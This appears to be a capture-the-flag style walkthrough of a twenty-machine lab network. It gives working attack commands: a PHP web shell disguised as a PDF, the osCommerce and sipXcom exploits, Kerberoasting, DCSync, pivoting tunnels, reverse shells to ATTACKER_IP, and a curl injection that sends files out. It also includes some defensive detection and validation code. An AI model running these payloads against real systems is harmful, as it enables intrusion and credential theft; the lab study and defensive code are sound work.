A note on flags: the actual local.txt and proof.txt values are different for you than they were for me. I am leaving the hashes out. They tell you nothing. The method is the point.
How to think about a twenty box network
Before any exploitation, it helps to understand the terrain, because the whole lab is built around movement between segments you cannot reach directly.
There are four networks:
- External (192.168.x.0/24) is the only thing you can reach from your attacker machine at the start. Eight machines live here, named after cities: HOUSTON01, AUSTIN02, PARIS03, MILAN04, AMSTERDAM05, SINGAPORE06, TOKYO07, SYDNEY08.
- Internal 1 (10.10.x.0/24) holds the Active Directory domain controller plus four more machines. You reach it by pivoting through AUSTIN02, which has a second network card.
- Internal 2 (10.20.x.0/24) holds the CI/CD and client machines. You reach it by pivoting again, this time through MAIL, which also has two network cards.
- Deep (172.16.x.0/24) holds three more machines, including a VoIP server. You reach it through a proxy on AMSTERDAM05.
Here is the layout:
| Segment | Subnet | Reached via | Machines |
|---|---|---|---|
| External | 192.168.x.0/24 | directly from your attacker box | HOUSTON01 (.220), AUSTIN02 (.221), PARIS03 (.222), MILAN04 (.223), AMSTERDAM05 (.224), SINGAPORE06 (.225), TOKYO07 (.226), SYDNEY08 (.227) |
| Internal 1 | 10.10.x.0/24 | pivot through AUSTIN02 (dual-NIC) | DC (.250), VM2 (.10), LAB (.11), ARCHIVE (.12), MAIL (.13) |
| Internal 2 | 10.20.x.0/24 | pivot through MAIL (dual-NIC) | CICD (.14), PREPROD (.15), CLIENT01 (.110), CLIENT02 (.111) |
| Deep | 172.16.x.0/24 | Squid proxy on AMSTERDAM05 (.224) | VM9 (.30), VM10 (.31), sipXcom (.32) |
The mental model that makes this lab tractable: a machine you own is rarely just a flag, it is a place to find the next credential or the next tunnel. Almost every box leaks something that unlocks another box. The credential table at the bottom of this post is the real map.
Two tools carry the whole thing:
- Ligolo-ng for pivoting. When you own a dual-homed machine, you run a small agent on it, and Ligolo gives your attacker box a route into the network behind it as if it were local. We use it twice: once through AUSTIN02 to reach 10.10.x, then again through MAIL to reach 10.20.x.
- CrackMapExec (crackmapexec, sometimes nxc) for spraying one credential across many Windows hosts at once and running commands on the ones where it is admin.
With that in mind, let us start where you actually start: the only machines you can see.
01. The independent external machines
Two external machines can be fully owned on their own, with no credentials from anywhere else. They are the way in. A third, PARIS03, gives up a flag early through a file read.
SINGAPORE06 (.225): a fake PDF and a database shell
Start with a port scan and a directory brute force. Port 8090 serves a PHP app.
dirsearch -u http://192.168.x.225:8090/ -t 200
# finds /backend/default/ with index.php, upload.php, config.php, uploads/
Log in with admin:admin. The app is a hardware provisioning portal and it has an upload form that only accepts PDFs. We bypass that. A web server decides a file is a PDF mostly by its first few bytes (its "magic bytes"), so we make a file that starts like a PDF but is actually PHP:
printf '%%PDF-1.5\n<?php echo system($_GET["cmd"]); ?>' > cmd.php
Upload it with Content-Type: application/pdf and a .php filename (use Burp or curl to set those). The server stores it and, because the extension is .php, runs it as code. Now you have a web shell:
curl 'http://192.168.x.225:8090/backend/default/uploads/cmd.php?cmd=id'
# uid=33(www-data)
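Seen from the defender's side, the upload check failed because it trusted the client's Content-Type and the first bytes while the stored extension decided whether the file would execute. The sketch below is an added example, not the lab application's code; the function names, the allowlist and the sample bytes are constructed for illustration.

```python
import os
import secrets

PDF_MAGIC = b"%PDF-"
ALLOWED_EXT = {".pdf"}

# Constructed samples: a PDF header followed by a PHP tag, and a minimal PDF skeleton.
POLYGLOT = b"%PDF-1.5\n<?php /* constructed placeholder */ ?>"
REAL_PDF = b"%PDF-1.5\n1 0 obj\n<< >>\nendobj\ntrailer\n<< >>\n%%EOF\n"


def naive_check(filename, content_type, data):
    """Models the weak check: client-supplied header plus magic bytes."""
    return content_type == "application/pdf" and data.startswith(PDF_MAGIC)


def strict_check(filename, content_type, data):
    """Return the reasons to reject an upload; an empty list means accept.

    content_type is ignored on purpose: it is chosen by the client.
    """
    problems = []
    base = os.path.basename(filename.replace("\\", "/"))
    # Every dot-separated suffix counts, so "a.php.pdf" and "a.pdf.php" both fail.
    suffixes = ["." + s.lower() for s in base.split(".")[1:]]
    if not suffixes or any(s not in ALLOWED_EXT for s in suffixes):
        problems.append("extension not allowed")
    if not data.startswith(PDF_MAGIC):
        problems.append("missing PDF header")
    # PDF readers look for the end-of-file marker near the end of the file.
    if b"%%EOF" not in data[-1024:]:
        problems.append("missing PDF trailer")
    # Heuristic second layer only; the extension rule is the real control.
    if b"<?php" in data.lower():
        problems.append("embedded script marker")
    return problems


def storage_name():
    """Server-chosen name, so the client never controls the stored extension."""
    return secrets.token_hex(16) + ".pdf"


if __name__ == "__main__":
    print("naive accepts polyglot:", naive_check("cmd.php", "application/pdf", POLYGLOT))
    print("strict on polyglot:", strict_check("cmd.php", "application/pdf", POLYGLOT))
    print("strict on real PDF:", strict_check("user-guide-rdweb.pdf", "application/pdf", REAL_PDF))
    print("stored as:", storage_name())
```

Storing uploads outside the web root, or in a directory where the PHP handler is disabled, removes the execution path even if a check is bypassed.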
That is the foothold and the local.txt. Now loot. Two things matter here. First, sitting in the uploads directory is a real PDF, user-guide-rdweb.pdf. Download it and read it. It contains a credential:
SKYLARK\kiosk:XEwUS^9R2Gwt8O914
Keep that. It is the key to AUSTIN02 and the whole domain. Second, the app config has database creds:
cat /var/www/backend/default/config.php
# postgres:EAZT5EMULA75F8MC
For root, check your sudo rights:
sudo -l
# (postgres) NOPASSWD: /usr/bin/psql
You can run psql as the postgres user without a password. PostgreSQL's interactive client has a built-in way to run shell commands with \!, so:
sudo -u postgres psql -h 127.0.0.1 -p 5432 -U postgres
# password: EAZT5EMULA75F8MC
\! /bin/sh
# now root
cat /root/proof.txt
First box down, and we are already holding a domain credential we have not used yet.
MILAN04 (.223): old shop software and a sneaky cron
MILAN04 runs an online store on port 60001. There is one catch that shapes everything you do here: an outbound firewall only lets the machine talk back out on port 443. Any reverse shell has to use 443.
Enumerate and identify the software:
dirsearch -u http://192.168.x.223:60001/
# /catalog/, /docs/
curl http://192.168.x.223:60001/docs/CHANGELOG
# osCommerce Online Merchant v2.3.4.1
osCommerce 2.3.4.1 has a well-known flaw: the installer was left in place and never checks whether the site is already installed. So you can re-run install step 4 and inject PHP into the config file it writes. Exploit-DB has it ready as 44374.py:
searchsploit -m php/webapps/44374.py
# edit the base_url and target_url inside to point at /catalog/
python3 44374.py
# gives a web shell at /catalog/install/includes/configure.php
From that web shell, pull a PHP reverse shell and trigger it. Remember, port 443 only:
# attacker: nc -lvnp 443
# via the web shell: wget http://ATTACKER_IP/rev.php
curl http://192.168.x.223:60001/catalog/install/includes/rev.php
# shell as www-data, read local.txt
For root, the box runs Froxlor, a hosting control panel, on port 60002. Find the MySQL password (linpeas surfaces it, the osCommerce DB user is oscdb):
mysql -h 127.0.0.1 -u root -p7NVLVTDGJ38HM2TQ
Now the clever part. Froxlor lets an admin set the command it uses to reload the web server, and that command runs as root from a cron job every five minutes. So if we can become a Froxlor admin, we get root. We insert our own admin straight into the database (you can also do it through a SQL injection in the customer panel, but direct insertion is simpler once you have MySQL):
USE froxlor;
INSERT INTO panel_admins
(loginname, password, customers_see_all, domains_see_all, caneditphpsettings, change_serversettings)
VALUES ('x', '$5$...your_known_hash...', 1, 1, 1, 1);
Log into Froxlor as your new admin. Go to Settings, Webserver settings, Webserver reload command. It blocks special characters like ;|&><$~? and quotes, so you cannot just paste a one-liner. Do it in two moves instead:
- Set the reload command to wget http://ATTACKER_IP/rev.php -O /runme.php
- Click Rebuild config files, Yes, and wait for the cron job to fire (up to five minutes). Your file lands on disk.
- Change the reload command to php /runme.php
- Rebuild again. The cron runs your PHP as root and you catch the shell.
cat /root/proof.txt
PARIS03 (.222): reading files over TFTP
PARIS03 has UDP port 69 open, which is TFTP, a tiny file transfer protocol with no authentication. It is running with path traversal, meaning you can climb out of its folder and read arbitrary files:
tftp 192.168.x.222 -c get '../../../users/administrator/desktop/local.txt' /tmp/local_222.txt
That hands you the local.txt with no exploit at all. The TFTP root also holds VoIP config files (sip-config, sip_327.cfg) that contain XMPP and SIP credentials we will need much later for the deep network. Grab them all now while you are here. PARIS03 gets a full shell later once we have domain admin passwords.
02. AUSTIN02 and the keys to the domain
AUSTIN02 (.221) is the hinge of the entire lab. It is our way into Active Directory, and it is dual-homed, so it is also our first pivot.
Getting in through RDWeb
Remember the credential from the SINGAPORE06 PDF. AUSTIN02 hosts RDWeb, a web portal for published Remote Desktop apps:
http://192.168.x.221/RDweb
SKYLARK\kiosk:XEwUS^9R2Gwt8O914
Log in and download the .rdp file for the published "SkylarkStatus" app, then connect to it (note the non-standard port 10000):
xfreerdp cpub-SkylarkStatus-QuickSessionCollection-CmsRdsh.rdp \
/u:kiosk /v:192.168.x.221 /d:SKYLARK +clipboard /port:10000 /cert-ignore
# password: XEwUS^9R2Gwt8O914
This drops you into a single published application, not a full desktop, but there is a classic escape: the app opens a file browser, and if you type cmd into the folder address bar and hit enter, you get a command prompt. From there, read local.txt.
Becoming admin with Kerberoasting
Now privilege escalation, and this is where the AD part begins. Kerberoasting asks the domain controller for service tickets that are encrypted with a service account's password hash, which you can then crack offline. Pull tickets with Rubeus:
certutil -urlcache -split -f http://ATTACKER_IP/Rubeus.exe Rubeus.exe
.\Rubeus.exe kerberoast /nowrap
You get a ticket for the account backup_service. Crack it:
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
# backup_service:It4Server
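On the detection side, a Kerberoast request shows up on the domain controller as Security event 4769 with ticket encryption type 0x17 (RC4) for a service that runs under a user account. The following is an added example, not part of the original write-up; the key=value log layout, the sample lines, the svc_* service names and the thresholds are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records using field names from Windows Security event 4769.
SAMPLE = [
    "2024-01-10T09:00:01 EventID=4769 TargetUserName=kiosk@SKYLARK.COM "
    "ServiceName=backup_service TicketEncryptionType=0x17 IpAddress=10.10.0.254",
    "2024-01-10T09:01:00 EventID=4769 TargetUserName=kiosk@SKYLARK.COM "
    "ServiceName=AUSTIN02$ TicketEncryptionType=0x17 IpAddress=10.10.0.254",
    "2024-01-10T09:02:00 EventID=4769 TargetUserName=k.smith@SKYLARK.COM "
    "ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.20.0.111",
    "2024-01-10T09:05:00 EventID=4769 TargetUserName=f.miller@SKYLARK.COM "
    "ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.20.0.110",
    "2024-01-10T09:05:10 EventID=4769 TargetUserName=f.miller@SKYLARK.COM "
    "ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.20.0.110",
    "2024-01-10T09:05:20 EventID=4769 TargetUserName=f.miller@SKYLARK.COM "
    "ServiceName=svc_ci TicketEncryptionType=0x17 IpAddress=10.20.0.110",
]


def parse(line):
    """Split 'timestamp key=value ...' into a dict with a parsed time."""
    ts, *pairs = line.split()
    rec = dict(p.split("=", 1) for p in pairs)
    rec["time"] = datetime.fromisoformat(ts)
    return rec


def suspicious(rec):
    """RC4 service ticket for a user-backed service (not a machine or krbtgt)."""
    svc = rec.get("ServiceName", "")
    return (rec.get("EventID") == "4769"
            and rec.get("TicketEncryptionType", "").lower() == "0x17"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def detect(lines, window=timedelta(minutes=2), sweep=3):
    """Group RC4 requests per requester; many distinct services in a window is a sweep."""
    by_user = defaultdict(list)
    for rec in map(parse, lines):
        if suspicious(rec):
            by_user[rec["TargetUserName"]].append(rec)
    findings = []
    for user, recs in sorted(by_user.items()):
        recs.sort(key=lambda r: r["time"])
        best = 0
        for i, first in enumerate(recs):
            seen = {r["ServiceName"] for r in recs[i:]
                    if r["time"] - first["time"] <= window}
            best = max(best, len(seen))
        findings.append({
            "requester": user,
            "services": sorted({r["ServiceName"] for r in recs}),
            "severity": "sweep" if best >= sweep else "single",
        })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

A single RC4 request is still worth a look where service accounts are configured for AES, and a long random password on the service account is what stops the offline crack.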
backup_service is gold. It is a local admin on several machines across the domain, and we will spray it everywhere. First, use it to get an admin shell on AUSTIN02 itself and finish the box. It does not have admin rights here directly, but it does have SeImpersonatePrivilege, which PrintSpoofer turns into SYSTEM:
evil-winrm -i 192.168.x.221 -u backup_service -p "It4Server"
# upload PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell
type C:\users\administrator\desktop\proof.txt
Looting and the first pivot
While you have a shell on AUSTIN02, gather intelligence. It has two network cards, which is your bridge into the internal network:
Ethernet0: 192.168.x.221 (external)
Ethernet1: 10.10.x.254 (internal)
Run mimikatz to dump the local Administrator's NTLM hash (you will pass this hash to other boxes later), and use PowerView to enumerate the domain and its shares. Then set up the pivot with Ligolo-ng:
# attacker:
sudo ip tuntap add user kali mode tun ligolo && sudo ip link set ligolo up
sudo ./proxy -selfcert
sudo ip route add 10.10.x.0/24 dev ligolo
# on AUSTIN02:
.\agent.exe -connect ATTACKER_IP:11601 -ignore-cert -retry -v
# in the Ligolo console, select the session and:
start
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:9001 --tcp # relay reverse shells
listener_add --addr 0.0.0.0:1235 --to 127.0.0.1:80 --tcp # relay file downloads
The ip route add line is the important one: it tells your attacker machine to send all 10.10.x traffic through the tunnel. The whole internal network is now reachable as if you were plugged into it.
03. Sweeping the internal domain
With the tunnel up, spray backup_service across the internal machines to see where it is admin:
crackmapexec smb 10.10.x.11 10.10.x.12 10.10.x.13 10.10.x.250 \
-u backup_service -p "It4Server" --continue-on-success
# .13 MAIL (Pwn3d!)
# .11 LAB (Pwn3d!)
# .250 DC (Pwn3d!)
# .12 ARCHIVE authenticates but no admin
Three Pwn3d! results, including the domain controller. Pwn3d! means you can run commands as admin.
LAB (.11): the credential drop
Run a command through CrackMapExec or pop a reverse shell. The whole reason this box matters is the C:\backup\ folder:
C:\backup\file.txt -> skylark:User+dcGvfwTbjV[]
C:\backup\ftp1.log -> ftp_jp:~be<3@6fe1Z:2e8
Two more credentials. The first logs into HOUSTON01's web portal, the second into TOKYO07's FTP. Read this box's proof.txt and move on.
MAIL (.13): the second pivot
MAIL is the second dual-homed machine, our bridge to the 10.20.x segment:
Ethernet0: 10.10.x.13
Ethernet1: 10.20.x.13
Set up a second Ligolo tunnel, this time with the agent reaching back through the first tunnel. Download the agent onto MAIL using the file relay you set up earlier, run it, then add the new route:
# on MAIL:
.\agent.exe -connect 10.10.x.254:11601 -ignore-cert -retry -v
# on the attacker:
sudo ip route add 10.20.x.0/24 dev ligolo
# in the Ligolo console, select the new session and:
start
Now both internal segments are reachable. Read MAIL's proof.txt.
DC (.250): the whole domain at once
The domain controller leaks a plain text file that is exactly what it sounds like:
C:\credentials.txt
- PARIS: MusingExtraCounty98
- SYDNEY: DowntownAbbey1923
Those are local admin passwords for two external machines we could not finish earlier. And because we are admin on the DC, we can run DCSync, which asks the DC to hand over the password hashes for every account in the domain, exactly as a replicating domain controller would:
.\mimikatz.exe "lsadump::dcsync /domain:skylark.com /all /csv" exit
That gives you, among everything else, the domain Administrator hash. Read the DC's local.txt and proof.txt. At this point the domain is effectively yours, and you have passwords for two more external boxes.
04. Cashing in the domain credentials
The C:\credentials.txt file and the DCSync hashes finish off the external machines we left hanging.
PARIS03 (.222) now gets a real shell over WinRM with the PARIS password (or by passing the Administrator hash):
evil-winrm -i 192.168.x.222 -u administrator -p "MusingExtraCounty98"
SYDNEY08 (.227) only has RDP open, so use the SYDNEY password there:
xfreerdp /v:192.168.x.227 /u:administrator /p:DowntownAbbey1923 /cert-ignore
# read the proof.txt in the session
HOUSTON01 (.220) is easiest with backup_service straight over WinRM:
evil-winrm -i 192.168.x.220 -u backup_service -p "It4Server"
type C:\local.txt
type C:\users\Administrator\desktop\proof.txt
But do not leave yet, because HOUSTON01 has the key to a Linux box on the inside. It runs UltraVNC, and UltraVNC stores its password in a config file with a fixed, publicly known encryption key:
type "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini"
# passwd=BFE825DE515A335BE3
Decrypt it with that well-known DES key:
echo -n 59A04800B111ADB060 | xxd -r -p | \
openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d
# R3S3+rcH
R3S3+rcH is the VNC password, and it is reused as the SSH password for the research user on VM2. Hold onto it.
05. The second internal segment
Through the MAIL tunnel, spray backup_service across 10.20.x:
crackmapexec smb 10.20.x.14 10.20.x.15 10.20.x.110 10.20.x.111 \
-u backup_service -p "It4Server" --continue-on-success
# .15 PREPROD, .110 CLIENT01, .111 CLIENT02 all Pwn3d!
# .14 CICD authenticates but no admin
PREPROD (.15) is the credential drop for this segment. Two files matter:
C:\inetpub\TODO.txt
admin:Complex__1__Password! (Filebrowser on ARCHIVE)
C:\inetpub\wwwroot\SkylarkPartnerPortal\.git\config
development:glpat-igxQz9aq3xu6s8_asknQ (GitLab access token)
The first is for ARCHIVE's file server. The second is a GitLab personal access token, our way onto CICD. Read PREPROD's flags (note its local.txt lives in the .git folder).
CLIENT01 (.110) and CLIENT02 (.111) are pure flag reads since we are already admin. Find and read them:
crackmapexec smb 10.20.x.110 -u backup_service -p "It4Server" \
-x "type c:\Users\f.miller\Desktop\local.txt"
crackmapexec smb 10.20.x.111 -u backup_service -p "It4Server" \
-x "type c:\Users\k.smith\Desktop\local.txt"
# plus the proof.txt files in the admin/offsec desktops
06. ARCHIVE: a web file manager and a captured password
ARCHIVE (.12) runs Filebrowser, a web-based file manager, on port 8080. We authenticated to its SMB earlier but were not admin; the way in is the web app, using the creds from PREPROD's TODO.txt:
http://10.10.x.12:8080
admin:Complex__1__Password!
Filebrowser has a built-in terminal feature. Use it to fire a reverse shell back through your tunnel:
/usr/bin/ncat 10.10.x.254 1234 -e /bin/bash
# read /home/archive/local.txt
For root, run pspy64 to watch processes without being root. You will see a cron job using socat to talk to a Unix socket at /tmp/s. The trick is to listen on that socket yourself and catch whatever gets sent to it, which turns out to be a password:
nc -Ul /tmp/s
# BreakfastVikings999
su root
# password: BreakfastVikings999
cat /root/proof.txt
07. CICD: a poisoned pipeline and a writable script
CICD (.14) runs GitLab. We have a GitLab token from PREPROD. The idea: GitLab runs CI/CD pipelines defined in a file called .gitlab-ci.yml, and those pipelines run commands on the runner. If we can push our own pipeline, we get code execution.
Add cicd.lab.skylark.com to your hosts file (pointed through the tunnel), then clone a repo with the token:
git clone http://development:glpat-igxQz9aq3xu6s8_asknQ@cicd.lab.skylark.com/skylark-rd/scratchpad.git
cd scratchpad
Edit .gitlab-ci.yml to include a reverse shell, then commit and push:
test:
  script:
    - bash -c "bash -i >& /dev/tcp/ATTACKER_IP/9001 0>&1"
git add . && git commit -m 'test' && git push
# attacker: nc -lvnp 9001 -> shell as gitlab-runner
cat /home/gitlab-runner/local.txt
For root, enumeration finds a cron job running /opt/fs_checks/fs.sh as root every five minutes, and that script sources another script, /opt/u/__fs.sh, which is world-writable. So we append our own command to it and wait:
echo 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/9001 0>&1"' >> /opt/u/__fs.sh
# wait up to 5 minutes for the root cron -> root shell
cat /root/proof.txt
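The root cause here is a root-run script that sources a file other users can modify. An audit for that pattern, as an added example that is not from the original write-up: the function names are made up, the demo builds a constructed copy of the fs.sh and __fs.sh layout in a temporary directory, and relative source paths are assumed to resolve against the script's own directory.

```python
import os
import re
import stat
import tempfile

# Matches "source FILE" and ". FILE" at the start of a line.
SOURCE_RE = re.compile(r"^\s*(?:source|\.)\s+([^\s;#]+)")


def sourced_files(script_path):
    """Paths a shell script pulls in with source or the dot command."""
    found = []
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            match = SOURCE_RE.match(line)
            if match:
                found.append(match.group(1).strip("'\""))
    return found


def writable_by_others(path):
    """Reasons an unprivileged user could change what path contains."""
    reasons = []
    if os.stat(path).st_mode & stat.S_IWOTH:
        reasons.append(f"{path} is world-writable")
    parent = os.path.dirname(os.path.abspath(path))
    mode = os.stat(parent).st_mode
    # A writable directory lets anyone replace the file unless it is sticky.
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        reasons.append(f"{parent} is world-writable without sticky bit")
    return reasons


def audit(entry_script, _seen=None):
    """Walk a script and everything it sources, collecting weak permissions."""
    seen = _seen if _seen is not None else set()
    entry = os.path.abspath(entry_script)
    if entry in seen or not os.path.isfile(entry):
        return []
    seen.add(entry)
    findings = writable_by_others(entry)
    for dep in sourced_files(entry):
        if not os.path.isabs(dep):
            dep = os.path.join(os.path.dirname(entry), dep)
        findings += audit(dep, seen)
    return findings


def demo():
    """Constructed layout: fs.sh sources u/__fs.sh, first weak, then fixed."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "u"))
    os.chmod(os.path.join(root, "u"), 0o755)
    helper = os.path.join(root, "u", "__fs.sh")
    entry = os.path.join(root, "fs.sh")
    with open(helper, "w") as fh:
        fh.write("echo checking\n")
    with open(entry, "w") as fh:
        fh.write(f"#!/bin/bash\nsource {helper}\n")
    os.chmod(entry, 0o755)
    os.chmod(helper, 0o666)   # the weak permission
    before = audit(entry)
    os.chmod(helper, 0o644)   # the fix
    after = audit(entry)
    return helper, before, after


if __name__ == "__main__":
    print(demo())
```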
08. VM2: a reused VNC password and a namespace trick
VM2 (.10) is the Linux box whose password we decrypted from HOUSTON01's UltraVNC config. SSH straight in:
ssh research@10.10.x.10
# password: R3S3+rcH
cat /home/research/local.txt
Look in Firefox's saved passwords (decrypt the profile with firefox_decrypt.py, or just open the browser in the VNC session). You will find another password, research:1G8prY^0@8FHy&2749cg, which is an alternate login for GitLab on CICD.
For root, check sudo:
sudo -l
# (root) NOPASSWD: /usr/sbin/ip
The ip command can create network namespaces and run a process inside one, and that process runs as root:
sudo ip netns add foo
sudo ip netns exec foo /bin/sh
# uid=0
cat /root/proof.txt
09. TOKYO07: an FTP upload and a juicy potato
TOKYO07 (.226) runs FileZilla FTP on port 24621 and IIS on 24680. The FTP creds came from LAB. The key fact is that the FTP root is the same folder IIS serves web pages from, so anything you upload over FTP can be run as a web page.
ftp 192.168.x.226 -p 24621
# ftp_jp:~be<3@6fe1Z:2e8
# put an aspx web shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f aspx -o shell.aspx
# upload via FTP, then trigger it:
curl http://192.168.x.226:24680/shell.aspx
The shell runs as a service account with SeImpersonatePrivilege, so JuicyPotatoNG gets you SYSTEM:
.\JuicyPotatoNG.exe -t * -p "C:\windows\temp\nc.exe" -a "-e powershell ATTACKER_IP 9001" -l 9999
The -l 9999 flag avoids a known port conflict error. Read the flags. Then find the loot, a KeePass database:
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
# C:\Users\j_local\Desktop\Passwords.kdbx
Crack it offline and open it. Inside is the credential for the next segment:
keepass2john Passwords.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /usr/share/wordlists/fasttrack.txt
# the database holds: ext_acc:DoNotShare!SkyLarkLegacyInternal2008 (Squid proxy)
10. The deep network behind a proxy
AMSTERDAM05 (.224) runs a Squid proxy on port 3128, and the KeePass credential logs into it. A web proxy that you can authenticate to is a way into whatever network sits behind it, so we point proxychains at it to reach the 172.16.x segment:
# /etc/proxychains4.conf
http 192.168.x.224 3128 ext_acc DoNotShare!SkyLarkLegacyInternal2008
Everything in the deep network is now reachable by prefixing commands with proxychains.
sipXcom (.32): command injection over chat
sipXcom is a VoIP server, and this one is vulnerable to CVE-2023-25356, a command injection in its sipXopenfire XMPP component. The short version: the server inspects every chat message, and any message starting with @call gets the text after it stuffed into a curl command that runs on the server. Because it is not sanitized, you can inject extra curl flags and make the server read or write any file.
Log into XMPP with the credentials we pulled from PARIS03's TFTP files long ago (j.jones:ChangeMePlease__XMPPTest and friends), using Pidgin. Then send @call messages.
First, exfiltrate the openfire log, which contains the admin password (curl -d sends a POST, so your listener needs to handle POST):
@call abc -o /tmp/dummy -d @/opt/openfire/logs/sipxopenfire-im.log http://ATTACKER_IP/abc -o /tmp/dummy
# the log reveals: superadmin:2008_EndlessConversation
To get root, write a malicious openfire.sh startup script (with a reverse shell inside it) by downloading it through the same injection. Note the -X GET, without it curl defaults to POST and the download fails:
@call abc -o /tmp/dummy -o /opt/openfire/bin/openfire.sh -X GET http://ATTACKER_IP/openfire.sh -o /tmp/dummy
Then restart the service using the admin password and the sipXcom REST API. The service manager runs openfire.sh as root, so your shell comes back as root:
curl -X DELETE -u "superadmin:2008_EndlessConversation" \
"http://172.16.x.32/sipxconfig/api/servers/1/features/instantMessage"
sleep 15
curl -X PUT -u "superadmin:2008_EndlessConversation" \
"http://172.16.x.32/sipxconfig/api/servers/1/features/instantMessage"
# catch the root shell, read proof.txt
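The injection class behind this chain, modelled next to a hardened form. This is an added example, not sipXcom's code: it assumes the handler builds one command string that is then split on whitespace, and the endpoint URL, function names, extension pattern and sample message are hypothetical.

```python
import re
from urllib.parse import quote

# Hypothetical endpoint standing in for the URL the server-side handler calls.
CALL_API = "http://127.0.0.1:8080/callcontroller/{caller}/{target}"

# Assumption: a call target is a short dialable extension and nothing else.
EXTENSION_RE = re.compile(r"[0-9*#+]{1,32}")


def unsafe_argv(message, caller="200"):
    """Model of the flaw: text after @call is pasted into a command string.

    Splitting the finished string on whitespace turns every extra word in the
    chat message into its own curl argument, options included.
    """
    target_text = message[len("@call"):].strip()
    command = "curl -X POST " + CALL_API.format(caller=caller, target=target_text)
    return command.split()


def safe_argv(message, caller="200"):
    """Validate first, then build the argument list directly.

    The message contributes exactly one URL path segment, and the URL is passed
    as the value of --url so it can never be read as an option. Calling the
    endpoint from an HTTP client library instead of curl removes the argument
    vector entirely.
    """
    parts = message.split(None, 1)
    if len(parts) != 2 or parts[0] != "@call":
        raise ValueError("not a call command")
    target = parts[1].strip()
    if not EXTENSION_RE.fullmatch(target):
        raise ValueError("target is not a dialable extension")
    url = CALL_API.format(caller=quote(caller, safe=""),
                          target=quote(target, safe=""))
    return ["curl", "--silent", "--request", "POST", "--url", url]


if __name__ == "__main__":
    crafted = "@call 201 -o /tmp/constructed"   # constructed sample message
    print("unsafe:", unsafe_argv(crafted))
    print("safe:  ", safe_argv("@call 201"))
    try:
        safe_argv(crafted)
    except ValueError as exc:
        print("rejected:", exc)
```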
One more thing to grab here: run tcpdump and watch the UDP syslog traffic. Another machine is logging to this one, and its log lines leak a password:
tcpdump -i ens192 udp -vvv
# 172.16.x.30 ... Msg: desktop:Deskt0pTermin4L
VM9 (.30): a SUID binary and a history file
desktop:Deskt0pTermin4L logs into VM9 over SSH or RDP through the proxy:
proxychains xfreerdp /u:desktop /p:"Deskt0pTermin4L" /v:172.16.x.30:3390
cat /home/desktop/local.txt
For root, find SUID binaries, files that run as their owner regardless of who launches them:
find / -perm -4000 -type f 2>/dev/null
# /sbin/capsh is SUID root
/sbin/capsh --gid=0 --uid=0 -- -c "cat /root/proof.txt"
And read the shell history, which leaks the password for AMSTERDAM05:
cat /home/legacy/.bash_history
# legacy:I_Miss_Windows3.1
AMSTERDAM05 (.224): the proxy box itself, via a capability
We have been using AMSTERDAM05 as a proxy this whole time; now we own it. SSH in with the password from VM9's history:
proxychains ssh legacy@192.168.x.224
# password: I_Miss_Windows3.1
cat ~/local.txt
For root, check Linux capabilities, a finer-grained version of SUID. Here vim has cap_setuid, which lets it change its user ID to root:
getcap -r / 2>/dev/null
# /usr/bin/vim.basic = cap_setuid+ep
vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
cat /root/proof.txt
VM10 (.31): the easiest root in the lab
VM10 is an old BSD machine. It has telnet on port 2323, and root has no password:
proxychains telnet 172.16.x.31 2323
# login: root
# password: (just press enter)
cat /root/proof.txt
After twenty machines, the last root is an empty password. That is Skylark's sense of humor.
The credential chain, in one place
This is the table I wish I had pinned up the whole time. Every credential, where it comes from, and what it unlocks. This is the actual structure of the lab.
| Credential | Found on | Unlocks |
|---|---|---|
| admin:admin | default guess | SINGAPORE06 web app |
| postgres:EAZT5EMULA75F8MC | SINGAPORE06 config.php | SINGAPORE06 root |
| SKYLARK\kiosk:XEwUS^9R2Gwt8O914 | SINGAPORE06 PDF | AUSTIN02 RDWeb |
| backup_service:It4Server | AUSTIN02 Kerberoast | LAB, MAIL, DC, HOUSTON01, PREPROD, clients |
| skylark:User+dcGvfwTbjV[] | LAB backup folder | HOUSTON01 portal |
| ftp_jp:~be<3@6fe1Z:2e8 | LAB backup folder | TOKYO07 FTP |
| Administrator NTLM hash | AUSTIN02 mimikatz / DCSync | pass-the-hash anywhere |
| PARIS admin:MusingExtraCounty98 | DC credentials.txt | PARIS03 WinRM |
| SYDNEY admin:DowntownAbbey1923 | DC credentials.txt | SYDNEY08 RDP |
| admin:Complex__1__Password! | PREPROD TODO.txt | ARCHIVE Filebrowser |
| development:glpat-... | PREPROD .git/config | CICD GitLab |
| R3S3+rcH | HOUSTON01 UltraVNC config | VM2 VNC/SSH |
| research:1G8prY^0@8FHy&2749cg | VM2 Firefox | CICD GitLab (alt) |
| BreakfastVikings999 | ARCHIVE socket capture | ARCHIVE root |
| ext_acc:DoNotShare!...2008 | TOKYO07 KeePass | AMSTERDAM05 Squid proxy |
| superadmin:2008_EndlessConversation | sipXcom openfire log | sipXcom admin |
| XMPP users :ChangeMePlease__XMPPTest | PARIS03 TFTP | sipXcom XMPP login |
| desktop:Deskt0pTermin4L | sipXcom syslog capture | VM9 RDP/SSH |
| legacy:I_Miss_Windows3.1 | VM9 bash history | AMSTERDAM05 SSH |